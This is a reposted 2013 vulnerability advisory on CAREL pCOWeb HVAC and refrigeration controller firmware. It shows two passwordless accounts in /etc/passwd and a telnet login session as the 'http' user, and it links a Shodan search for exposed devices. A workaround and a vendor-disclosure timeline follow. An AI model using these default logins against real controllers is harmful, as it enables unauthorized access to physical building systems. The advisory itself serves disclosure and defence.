Home / vulnerabilities CAREL pCOWeb 1.5.0 Default Credential Shell Access
Posted on 23 May 2013
Source : packetstormsecurity.org Link
Title: CAREL pCOWeb firmware version 1.5.0 and lower passwordless accounts
Author: xistence ( xistence[at]0x90[.]nl )
Software link: http://ksa.carel.com/documents/10451/30816/pCOWeb_1_5_0.zip
Vendor site:
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_mercato=4&id_gamma=39&id_prodotto=350
Shodan: http://www.shodanhq.com/search?q=pCOWeb
Description: CAREL pCOWeb is an interface used in "air-conditioning
controls", "refrigeration controls" and "telemaintenance systems".
Vulnerability: Passwordless accounts
The CAREL pCOWeb firmware version 1.5.0 and lower contains a /etc/passwd
which has the following 2 passwordless accounts:
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
Logging in through telnet without a password is possible and it's not
possible to change or see these accounts through the web interface.
The "http" user basicly got access to all files (including /etc/passwd
which contains the hashes for the root user) as it's in almost every group:
$ telnet <ip>
Linux 2.4.21-rmk1 (localhost) (ttya0)
localhost login: http
No directory /usr/http/root!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[http@localhost14:35:47 /]$ id
uid=48(http) gid=48(http)
groups=48(http),200(httpadmin),500(carel),80(update)
Solution (workaround):
Login with telnet and set a password or change the shell from "/bin/bash"
to "/bin/nologin".
[*] 01-25-2013 Contacted vendor
[*] 01-25-2013 Vendor responded that they will release an updated firmware, supplied workaround
[*] 05-22-2013 No updated firmware released, public disclosure
